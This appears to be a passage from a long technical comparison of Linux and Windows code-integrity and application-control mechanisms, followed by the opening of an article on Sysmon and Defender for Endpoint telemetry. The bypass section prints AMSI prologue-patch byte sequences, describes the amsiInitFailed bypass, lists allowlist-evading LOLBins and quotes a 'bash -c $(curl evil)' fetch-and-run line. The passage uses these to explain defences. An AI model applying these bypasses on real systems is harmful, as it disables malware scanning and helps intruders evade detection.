Kernel module signing	App Control + HVCI driver enforcement	Kernel-mode code integrity
fs-verity + dm-verity	HVCI page-level W^X + signed catalogues	Page-level integrity
AppArmor / SELinux	(no direct analogue; closest is AppContainer / ASR)	Mandatory access control
fapolicyd	App Control + AppLocker	User-space allowlist
IPE	App Control (FilePath / hash rules)	Property-based code integrity
(no direct analogue)	AMSI	Script content scan
(no direct analogue)	Smart App Control + ISG	Cloud reputation

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

Dimension	Linux IMA + EVM	WDAC (App Control)	IPE
Enforcement layer	VFS / LSM hook (file open, mmap, exec)	PE loader (kernel CI, user-mode CI)	LSM hook on `op=EXECUTE`
Identity primitive	File-content hash or `imasig` / `modsig` / `sigv3`	Authenticode chain, hash, FilePath, or ISG	dm-verity root hash / fs-verity digest
Policy expression	Procedural rules (`func=` / `mask=` / `fsmagic=`)	Signed XML compiled to binary `.p7b`	Signed plain-text DFA
Worst-case per-access	O(n) hash on first access; O(1) cached	O(1) cached; O(n) hash on cache miss	O(1) (properties precomputed)
Fail-closed mode	Yes (appraise)	Yes (enforced)	Yes
Remote-attestation friendly	Yes (TPM PCR 10)	Indirect (Measured Boot logs)	Indirect
Bypass arms race	Whole-disk swap (countered by EVM key sealing)	LOLBins (Microsoft block list + community LOLBAS)	Limited surface (DFA-only)

The IMA policy ABI [@kernel-org-testing-imapolicy] documents the full rule grammar: action [condition ...] where action is one of measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash, and conditions select on func=, mask=, fsmagic=, fsuuid=, uid=, fowner=, LSM-label predicates, and the all-important appraise_type= modifier that names the signature scheme. IMA template management [@docs-kernel-org-ima-templateshtml] controls what gets recorded per measurement-list entry; the two templates used in practice today are ima-ng (d-ng|n-ng: hash-algo-prefixed digest plus name) and ima-sigv2 (d-ngv2|n-ng|sig: versioned digest plus name plus signature).

WDAC's policy rule reference [@learn-microsoft-com-to-create] defines the rule kinds operators actually write: Publisher, PcaCertificate, LeafCertificate, FileName, Version, Hash (SHA-1, SHA-256, or SHA-384), FilePath (added in 1903 and explicitly weaker because a user with write access can substitute the file), Managed Installer, and Intelligent Security Graph. The compiled output is a signed binary .p7b CIPolicy.

The same doc records the default-on audit-mode behaviour that has surprised many operators: "We recommend that you use Enabled:Audit Mode initially because it allows you to test new App Control policies before you enforce them ... By default, only kernel-mode binaries are restricted. Enabling the following rule option validates user mode executables and scripts." The Enabled:UMCI flag is what flips a WDAC policy from kernel-only to full user-mode enforcement.

flowchart LR PE[PE load request] --> AC[Parse Authenticode signature] AC --> RM[Match rule set] RM --> P[Publisher / cert rule?] P -->|hit| AL[Allow] P -->|miss| H[Hash rule?] H -->|hit| AL H -->|miss| FP[FilePath rule?] FP -->|hit| AL FP -->|miss| MI[Managed Installer?] MI -->|hit| AL MI -->|miss| ISG[Intelligent Security Graph?] ISG -->|hit| AL ISG -->|miss| DEF[Default action] AL --> BL{"In bypass-list deny?"} BL -->|yes| BLK[Block] BL -->|no| LOAD[Loader continues] DEF --> BLK

6.2 Mandatory access control: AppArmor vs SELinux

Dimension	AppArmor	SELinux
Model	Path-based allowlist per binary	Type-enforcement on subject x object x class
Storage of policy state	In-memory DFA loaded from user space	`security.selinux` xattr + compiled `policy.31`
Granularity	Profile per executable	Per-type, per-class, per-operation
Survives file rename	No (path is the identity)	Yes (xattr travels with inode)
Default-on distros	Ubuntu, openSUSE, SLES	RHEL, Fedora, Oracle Linux, Android, ChromeOS
Authoring tools	`aa-genprof`, `aa-logprof`, `aa-enforce`	`audit2allow`, `semodule`, refpolicy, `udica`

AppArmor's kernel documentation [@docs-kernel-org-lsm-apparmorhtml] describes the model directly: "AppArmor is MAC style security extension for the Linux kernel. It implements a task centered policy, with task 'profiles' being created and loaded from user space." A profile reads like a rule file rather than a label algebra:

/usr/sbin/nginx {
  capability net_bind_service,
  /etc/nginx/** r,
  /var/log/nginx/* w,
  /var/www/** r,
  network inet stream,
}

The kernel compiles each profile to a DFA at load time, so policy lookup is O(L) in path length. SELinux's compiled policy uses a hash-table query against compiled type-enforcement rules with an in-memory access-vector cache for O(1) hot decisions. Both are practical; they differ on which model fits the way an administrator thinks. AppArmor wins on auditability and quick authoring; SELinux wins on expressiveness and on what the Wikipedia summary [@en-wikipedia-org-security-enhancedlinux] calls Mandatory Access Control for multi-level security. Smack [@schaufler-ca-com] is a third in-tree LSM, simpler than SELinux, used heavily by Tizen.

Red Hat's `fapolicyd` is the answer for operators who want App Control-style allowlisting without rebuilding the kernel. Trust is inherited from the RPM database; the daemon sits on the kernel's `fanotify` permission channel and answers ALLOW or DENY on every `open` and `exec`. Per the RHEL hardening guide [@access-redhat-com-fapolicydsecurity-hardening], rule files in `/etc/fapolicyd/rules.d/` are concatenated in lexicographic order into `compiled.rules`. The Red Hat-shipped numbered prefixes are 10 (language interpreters), 20 (dracut), 21 (updaters), 30 (patterns), 40/41/42 (ELF), 70 (trusted languages), 72 (shell), 90 (deny-execute), 95 (allow-open). First-match-wins evaluation means operators adding custom rules must give their file a number lower than 90 to ensure their `allow` is reached before the catch-all deny.

6.3 Hypervisor-anchored CI: HVCI

HVCI's runtime cost is dominated by the hypercall round-trip from VTL0 to VTL1 on driver load and on each executable-page allocation. Steady-state overhead is small on hardware with the right capabilities.

Microsoft's HVCI documentation [@learn-microsoft-com-code-integrity] names the dependency: "Memory integrity works better with Intel Kabylake and higher processors with Mode-Based Execution Control, and AMD Zen 2 and higher processors with Guest Mode Execute Trap capabilities. Older processors rely on an emulation of these features, called Restricted User Mode, and will have a bigger impact on performance." Practitioner-visible rule of thumb: less than 5 percent overhead on MBEC/GMET-capable silicon, 10 to 20 percent on kernel-bound workloads when the CPU has to emulate.

HVCI hardware prerequisites per the OEM VBS guidance [@learn-microsoft-com-oem-vbs]: 64-bit CPU with virtualization extensions (VT-x or AMD-V), second-level address translation (EPT or RVI), an IOMMU (VT-d or AMD-Vi), TPM 2.0, UEFI MAT, Secure MOR v2, and ideally MBEC (Intel) or GMET (AMD).

6.4 Script-level inspection: AMSI vs Linux's gap

Dimension	AMSI	Linux IMA on scripts
What it sees	Deobfuscated script buffer at execution time	Whole-file content at `open` or `mmap`
Coverage	PowerShell, WSH, VBA, JScript, MSHTA, UAC installers, .NET, Edge	Any file whose `func=FILE_CHECK` rule matches
Provider model	COM `IAntimalwareProvider` per process	None; kernel verifies signature directly
Defends against runtime obfuscation	Yes (sees final buffer)	No (sees file as written)
Trust boundary	Wrong (in-process; patchable by attacker)	Right (kernel-side; attacker cannot patch)

The asymmetry is the point. AMSI sees what the interpreter is about to evaluate; IMA sees only what is on disk. AMSI catches in-memory PowerShell payloads, Office macros that decode themselves at runtime, and Invoke-Expression evaluations that never touched the filesystem. IMA's hash is final at file write time and tells you exactly nothing about what bash -c "$(curl evil)" will execute.

The reduced PowerShell language mode App Control forces on systems with UMCI enabled. It blocks reflection (the `[System.Reflection]` namespace), dynamic-type creation, and arbitrary .NET API calls. It is the runtime-side complement to App Control: even if a script gets in, its evaluation surface is dramatically reduced. This is also what makes the `amsiInitFailed` flag-flip bypass non-trivial under modern App Control: the reflection needed to set the flag is blocked.

6.5 Cloud reputation: Smart App Control

Smart App Control [@learn-microsoft-com-business-appcontrol] ships as a pre-baked WDAC policy bundled with Windows 11 22H2 and later. The App Control overview describes it as the consumer-facing entry point introduced in Windows 11 version 22H2 to bring application control to home users. On every fresh install SAC starts in evaluation mode for 48 hours. Microsoft's cloud reputation service silently observes the user's app inventory; on enterprise-managed devices SAC auto-disables at the end of the window unless the user explicitly opts in. Once disabled by user, policy, or the auto-disable rule, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC is not sufficient.

Three quirks operators must understand. First, evaluation lasts 48 hours and is silent. Second, enterprise-managed (Intune, AAD-joined, GPO-managed) devices auto-disable at evaluation end. Third, disable is one-way: there is no "restart evaluation" path. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. Consumers with a small app footprint and no IT team get a cloud-driven allowlist for free; everyone else is expected to author a policy.

Note: Once Smart App Control is off on a device, it can only be re-enabled by performing a clean install of Windows. A Settings > Reset This PC does not re-enable SAC. Treat enabling SAC as a deployment decision, not a casual toggle.

6.6 fs-verity as the per-file Merkle layer

For the data-at-rest performance story, fs-verity's ioctl(FS_IOC_ENABLE_VERITY) builds the Merkle tree, persists it next to the file, and switches the file to read-only. FS_IOC_MEASURE_VERITY returns the digest in constant time. IMA's policy language gained appraise_type=sigv3 and the digest_type=verity modifier so a rule like

appraise func=BPRM_CHECK fsmagic=0xef53 appraise_type=sigv3 digest_type=verity

asks the filesystem for the file's fs-verity digest (O(1)) and verifies the kernel-stored signature over that digest, rather than re-hashing the file even on first access. Supported on ext4, f2fs, and btrfs.

Eleven mechanisms, two architectures, one shared shape: an allowlist of trusted producers plus a hook that can refuse to honour anything outside it. The allowlist of producers is the deepest common assumption, and it is also where the next class of attacks lives.

7. Bypass arms races

Every code-integrity system on the market is in a continuous fight with the bypass it shipped with. The fights tell you what each architecture got wrong.

The AMSI bypass family

The three single-shot techniques from Section 4 -- prologue patch, amsiInitFailed flag flip, library unload -- have all been answered by partial mitigations. Microsoft has hardened AMSI provider loading [@learn-microsoft-com-interface-portal] to require Authenticode-signed provider DLLs from Windows 10 1903 onward. Defender ships ETW-based detection that flags in-memory patches to amsi.dll. Constrained Language Mode (forced by App Control) blocks the reflection needed to flip AmsiUtils.amsiInitFailed. None of these closes the structural problem. AMSI is by design a function call inside the script host. As long as the host process is the trust boundary, the attacker who reaches the host process wins.

The trust boundary is wrong: the host process making the AMSI call is the same process the attacker is running in. The simplest in-memory patch overwrites `AmsiScanBuffer`'s prologue with a six-byte sequence that loads `AMSI_RESULT_CLEAN` (0) into EAX and returns:

xor eax, eax    ; 31 C0
ret             ; C3

or, depending on the calling convention the patcher targets:

mov eax, 0x80070057   ; B8 57 00 07 80   (HRESULT E_INVALIDARG)
ret                   ; C3

Both variants are detected by modern Defender via the ETW patch detection, but neither requires kernel privileges or a syscall to apply.

The WDAC LOLBin arms race

Microsoft's App Control bypass list [@learn-microsoft-com-bypass-appcontrol] is a maintained document that any non-trivial WDAC policy must merge into its deny rules. The 40-plus entries include mshta.exe, wscript.exe, cscript.exe, msbuild.exe, Microsoft.Build.dll, windbg.exe, cdb.exe, kd.exe, dotnet.exe, csi.exe, rcsi.exe, addinprocess.exe, addinutil.exe, aspnet_compiler.exe, bash.exe, wsl.exe, runscripthelper.exe, system.management.automation.dll, and webclnt.dll / davsvc.dll. The community LOLBAS index [@lolbas-project-github-io] widens the field to roughly 200 entries with MITRE ATT&CK technique IDs.

Tooling (the WDAC Wizard, AaronLocker, Microsoft's ConfigCI PowerShell module, CiTool.exe) automates merging the deny set into a base policy and onto Intune. The asymmetry is the bottom line: trust granted at signer granularity, exploitation at binary granularity. The deny list is not a fix; it is a treadmill.

A trusted binary, often shipped by the OS vendor and signed by the vendor's code-signing certificate, that an attacker re-purposes to bypass an allowlist or to perform actions that would be blocked if attempted with non-vendor tooling. Examples on Windows: `mshta.exe` to evaluate HTA scripts, `regsvr32.exe` to execute a remote scriptlet, `installutil.exe` to run code via a designed-for-development assembly loader.

fapolicyd permissive-window

This is not a cryptographic bypass; it is the architectural choice (userspace daemon over fanotify) showing its operational seam. A privileged operator who sets permissive=1 to debug a noisy rule and forgets to revert has silently disabled enforcement. If the daemon dies under load or after a bad rule deploy, the kernel waits for the fanotify response timeout and then fails open. There is no failsafe equivalent of HVCI's "the verifier is in another address space" guarantee.

IMA / EVM offline-key attacks

EVM is only as strong as its key custody. If the HMAC key is loaded from a file on disk (the worst-case configuration), an attacker with root on a running system can read it, then perform the offline-rewrite attack of Section 4 with a valid security.evm HMAC. TPM-sealed keys close this path on hardware that supports sealing; some installations skip the seal step "until we add a TPM" and never do. Asymmetric (EVM portable signatures) mode avoids on-box key custody but requires a per-package signing pipeline most distributions have not built.

The cross-stack symmetry

Both lineages obey two architectural rules, and both have at least one place where they break each rule:

Bypass class	Linux instance	Windows instance	Root cause	Partial mitigation
Verifier shares address space with attacker	(script interpreters; no in-kernel interpreter scanner)	AMSI prologue patch, `amsiInitFailed` flag flip	Software-only protection of an in-process secret is impossible	ETW patch detection, signed providers, Constrained Language Mode
Trust grant coarser than exploit unit	RPM trust pre-fapolicyd integrity-mode addition	WDAC Publisher rules + LOLBins	Trust algebra cannot express "Microsoft except mshta" with one rule	Hash-level denies, growing block list
Reference value reachable by attacker	IMA without EVM	(HVCI moved the kernel verifier out of reach)	Reference value next to the file under attacker control	EVM HMAC sealed to TPM PCR
Verifier is killable	fapolicyd daemon failure	(HVCI verifier is hypervisor-isolated)	Verifier liveness is part of the trust assumption	TPM-sealed boot policy + kernel-mode fallback

The first row is the most uncomfortable for both stacks. Linux does not have an AMSI-equivalent in production, so there is no in-kernel hook that sees the buffer an interpreter is about to evaluate; the boundary is not "wrong", it simply does not exist. Windows has the hook and has paid for the consequences of putting it in the wrong place for ten years. Neither result is good.

The lesson from both rows of pivots is consistent: when an architecture is forced to put the verifier somewhere reachable, treat its output as telemetry rather than control, and budget for the bypass.

These are not implementation bugs. They are structural features of the architectures, and to understand why, we have to look at what computer science says is and is not possible.

8. What the theory says

Three impossibility results bound everything in this article. Two are decades old; the third is a property of how modern interpreted languages execute.

Rice's theorem

Rice's 1953 theorem says that any non-trivial semantic property of an arbitrary program is undecidable from the program text alone. Applied to malware: there is no algorithm that takes a binary as input and returns "malicious" or "benign" in finite time for every input.

Every code-integrity stack on the market therefore reduces to the same shape: an allowlist of producers (signers, hashes, dm-verity roots) the operator chooses to trust, plus a hook that refuses to honour anything outside the allowlist. Defender, ClamAV, the AMSI scanner -- all the things we call "malware detectors" -- are heuristic add-ons running on top of an allowlist substrate, and they are explicitly fallible. They have to be.

No software-only protection of an in-process secret

The second result is operational, not formal, but it is no less binding. If process P holds a secret S, and process P also evaluates code C the attacker chose, then no purely software-side technique inside P can keep C from reading or rewriting S.

AMSI's design violates this: the scanner is a function call inside the script host, and the attacker is running code in the script host. HVCI's entire architecture exists to relocate the kernel-mode code-integrity verifier out of the host's address space, into a secure kernel the attacker cannot reach with normal kernel privileges. EVM's design likewise moves the integrity-defining key into a kernel keyring sealed to TPM PCRs so an offline attacker with disk access cannot reach it.

No verification of dynamically generated executable code

The third result is the gap on both operating systems. JIT-compiled code (V8, JVM, CLR), libffi closures, and anonymous mmap followed by mprotect(PROT_EXEC) all produce executable bytes that did not exist on disk and were never hashed.

The IPE documentation [@docs-kernel-org-lsm-ipehtml] lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC's User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.The JIT gap is one reason both stacks ship "Constrained Language Mode"-style restricted-runtime options. PowerShell's Constrained Language Mode blocks reflection and dynamic-type creation; the JVM's --module-path and module-system encapsulation play a similar role for hosted Java code; the CLR's AppContainer and the .NET Core trim modes lean the same way. None of these "verify" the JIT output; they restrict what the runtime is willing to emit.

Cryptographic bounds

The cryptographic side, by contrast, is closed.

Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.
A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. fs-verity matches this lower bound.
Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.

So on the crypto side the gap between upper and lower bounds is closed. On the policy-expressiveness side there is no "best" policy because the right policy depends on threat model. There is no Pareto frontier; there are only trade-offs.

Bound	What it says	Mechanism that matches it	Remaining gap
Rice's theorem	"Is this binary malicious?" is undecidable	Every CI stack is an allowlist + signer model	Allowlist composition is itself a policy problem
In-process secret	No purely-software defence inside the attacker's address space	HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM	AMSI design violates this; the gap is structural
Hash verification	$\Omega(n)$ per full read; $O(\log n)$ per partial read	fs-verity per page; IMA cached on `i_iversion`	Cold-cache cost remains O(n) for non-fs-verity files
JIT and dynamic code	No way to verify code that did not exist on disk	None	Restricted-runtime modes (CLM, AppContainer) are the best partial answer
Asymmetric verify	About 60-300 us per RSA-2048 or Ed25519 verify on modern x86	Authenticode catalogues amortise; IMA caches in inode	Cold cache is the only sensitive case

Key idea: Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.

If the theory says we cannot win, what is research targeting in 2026?

9. Open frontiers

Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.

Linux integrity at distribution scale: the Integrity Digest Cache

IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file imasig signature on every open is expensive.

Roberto Sassu (Huawei Cloud) proposed a fix as the digest_cache LSM in version 3 of the patchset, posted in February 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom] and covered on LWN [@lwn-net-articles-961591]. The v3 cover letter is concrete: "Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read." The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a digest_cache_lookup() primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.

By v6 in November 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom-2] the work had been retitled "Introduce the Integrity Digest Cache" and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement "introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open()." Discussion continues on the linux-integrity list [@lore-kernel-org-linux-integrity]; memory safety of the TLV parser was verified with the Frama-C [@frama-c-com] static analyser. As of late 2024 the work is not yet upstream.

Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read. -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024

The important framing correction: the Integrity Digest Cache is not a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.

Out-of-process AMSI broker

The conjectural fix on the Windows side is an out-of-process AMSI broker: every AmsiScanBuffer call IPCs to a service running outside the script host's address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.

Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.

Cross-OS attestation

A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA's measurement-log format (ima_template_fmt) and Windows Measured Boot's WBCL [@trustedcomputinggroup-org-log-format] both target TPM PCRs but encode events differently.

Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.

Problem	Current best partial result	Upstream status
IMA appraisal scale on RPM-signed distros	Integrity Digest Cache, 45-65% appraisal speedup	Patchset v6 (Nov 2024); not upstream
AMSI in-process trust boundary	Signed provider DLLs, ETW patch detection, CLM	Partial; structural fix would be OOP broker
Linux script-content scanning	Nothing in production	Open
Cross-OS attestation interop	TCG CEL, TDX/SEV-SNP quotes	Platform-layer; workload-level still split
WDAC LOLBin treadmill	Microsoft block list + LOLBAS + WDAC Wizard	Operational; structural fix unknown

Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore operational, not technological.

10. Practitioner decision guide

Eight common deployment scenarios. Eight concrete answers.

If you need...	On Linux, use...	On Windows, use...
TPM-backed remote attestation	IMA + EVM (TPM PCR 10)	Measured Boot + TPM PCR 11 + HVCI
Block unsigned drivers	`module.sig_enforce=1` plus kernel module signing	HVCI (Memory Integrity)
Cryptographic allowlist of installed software	fapolicyd (RPM/DEB trust)	App Control with Publisher rules
Per-app sandbox	AppArmor or SELinux	AppContainer or App Control (no direct equivalent)
Catch in-memory PowerShell payloads	(no direct equivalent)	AMSI
Consumer-grade reputation gating	(no direct equivalent)	Smart App Control
Immutable appliance image	dm-verity + IPE	App Control with hash rules + HVCI
Large APK-style assets verified lazily	fs-verity	(no direct equivalent)

The why behind each row.

TPM-backed attestation. On Linux, IMA's measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.

Blocking unsigned drivers. Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.

Application allowlisting on general-purpose distributions. This is fapolicyd's wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean "trusted" list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.

Per-app sandboxing. Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; AppContainer or Microsoft Defender Attack Surface Reduction rules are the substitutes.

In-memory PowerShell payloads. AMSI's use case. Linux has nothing equivalent in production.

Consumer reputation gating. Smart App Control's use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.

Immutable appliance images. Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.

Large lazy-loaded assets. Fs-verity territory; Windows has no public equivalent.

Common implementation pitfalls

Distilled from the same shape: every stack has a default that surprises operators.

IMA without EVM and without a TPM-sealed key is decorative. Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.
AppArmor profiles authored in complain mode never get promoted to enforce. Schedule a config-management pass that runs aa-enforce on the profiles you actually want to confine.
SELinux setenforce 0 for debugging that becomes permanent. The /.autorelabel flag is required after restoring contexts; track that you flipped it.
fapolicyd permissive-mode lapses. Set up alerting on permissive=1 in the runtime configuration; treat the daemon's exit status as a security event.
WDAC's Enabled:Audit Mode policy-rule option is on by default. Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is off before declaring rollout complete.
HVCI without a driver-compatibility check. Microsoft's DG_Readiness_Tool and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.
Treating AMSI as a control. It is telemetry. Budget for the bypass on day one.
Smart App Control disable is one-way. A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.

Note: On Linux: enable IMA in measure mode before appraise; deploy AppArmor / SELinux profiles in complain / permissive before enforce; run fapolicyd with permissive=1 for the first deploy. On Windows: leave WDAC's Enabled:Audit Mode set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.

Note: A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed-xattr xattrs, IMA appraisal is mostly a check-box. fapolicyd with integrity=ima may be a saner starting point on machines without TPM.

Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline. Path-based reasoning maps to how administrators think about confinement: "this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket." SELinux's type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux. No. Microsoft's block list [@learn-microsoft-com-bypass-appcontrol] grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter. Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls. On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer) [@learn-microsoft-com-oem-vbs], the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; "free" is a Kaby Lake-and-newer claim. Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings > Reset This PC does not bring it back.

The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.

What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice's wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.

From `cmd.exe` to a Kusto Row in 90 Seconds: How Sysmon and Defender for Endpoint Actually Work

noreply@paragmali.com (Parag Mali) — Wed, 13 May 2026 00:00:00 GMT

Modern Windows EDR is a seven-layer production pipeline. A kernel callback fires, a user-mode aggregator labels the event, an ETW publisher (Sysmon) or a TLS-pinned cloud forwarder (`SenseCncProxy.exe`) ships it, and within seconds the event surfaces as a row in a Kusto table that the analyst queries with KQL. Sysmon (Russinovich and Garnier, August 2014) is the configurable kernel-callback-then-publish reference: twenty-nine event IDs, three canonical configurations (SwiftOnSecurity, the post-rename `NextronSystems/sysmon-config`, and `olafhartong/sysmon-modular`), Antimalware-PPL hardening since v15 in June 2023. Microsoft Defender for Endpoint (Windows Defender ATP preview March 2016, MDE rename September 2020, Microsoft Defender XDR portal late 2023) is the commercial cloud-correlated counterpart: `MsSense.exe` runs as Antimalware-PPL, shares the `WdFilter.sys` / `WdBoot.sys` / `WdNisDrv.sys` Defender Antivirus kernel surface, and lands events in six `Device*` Advanced Hunting tables with 30-day in-portal retention, extended via the Microsoft Sentinel Defender XDR connector. For MDE-licensed shops with a detection-engineering team, the community pattern is Hartong's `sysmonconfig-mde-augment.xml` -- Sysmon as a complement, not a duplicate. The pipeline's four structural ceilings (pre-driver-load horizon, observation-vs-enforcement latency, MDE schema truncation, kernel-mode adversary primitive) are documented and unclosed; FalconForce's 2022 CVE-2022-23278 disclosure and InfoGuard Labs' 2025 certificate-pinning bypass bookend an adversarial arc the field has not yet ended.

1. From `cmd.exe` to a Kusto Row in Ninety Seconds

At 9:14 a.m. on a Monday, a SOC analyst named Maya watches a DeviceProcessEvents row light up in the Advanced Hunting console of Microsoft Defender XDR. The FileName is powershell.exe. The ProcessCommandLine reads powershell.exe -enc JABzAD0A.... The InitiatingProcessFileName is WINWORD.EXE. The Timestamp is three seconds ago [@deviceprocessevents-table].

By 9:15:44 Maya has pivoted to DeviceNetworkEvents, found an outbound connection from the same InitiatingProcessId to a previously-unknown IP on TCP/443, clicked Isolate device in the device page, and the endpoint is off the network. Ninety seconds, end to end. Email triage of the original message; a quarantine on the inbound .docm; and -- by the time the user's coffee has cooled -- a brand-new IOC in the tenant's custom indicator list.

This article is the rewind. We walk Maya's ninety seconds backwards through the seven pipeline layers that made the triage possible -- starting in ring zero, ending in the KQL query you can copy into your own tenant -- and along the way we answer the question every SOC manager has asked at least once: do we deploy Sysmon alongside Defender for Endpoint, or trust Defender alone?

The seven layers

Maya is looking at a single Kusto row. Behind that row sit seven distinct software components, each of which can fail independently:

A kernel callback fired inside the nt!PspInsertProcess path on the target machine the instant WINWORD.EXE called CreateProcessW to spawn powershell.exe. The callback handler lives inside WdFilter.sys (Defender Antivirus's filter driver) and inside SysmonDrv.sys if Sysmon is also installed [@pssetcreateex-msdn].
A user-mode aggregator -- MsSense.exe for Defender for Endpoint, or Sysmon.exe (the service) for Sysmon -- received the structured callback notification, enriched it with parent-process state, file hashes, signature information, and identity data, and decided whether the event was worth shipping [@mde-ms-learn][@sysmon-ms-learn].
An ETW publisher -- in Sysmon's case the Microsoft-Windows-Sysmon provider -- emitted the event to the operating system's tracing bus, and the Sysmon service wrote it to the Microsoft/Windows/Sysmon/Operational event log [@sysmon-ms-learn].
A cloud forwarder -- SenseCncProxy.exe -- ran the Defender payload through TLS with certificate pinning out to the regional Defender XDR ingest endpoint [@falconforce-2022].
